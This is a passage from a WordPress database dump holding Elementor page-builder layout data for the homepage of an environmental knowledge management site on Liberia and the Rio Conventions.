op\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false}]'),(5840,521,'_elementor_version','2.7.5'),(5841,521,'_elementor_template_type','wp-page'),(5851,523,'_wp_page_template','default'),(5852,523,'_elementor_edit_mode','builder'),(5853,523,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\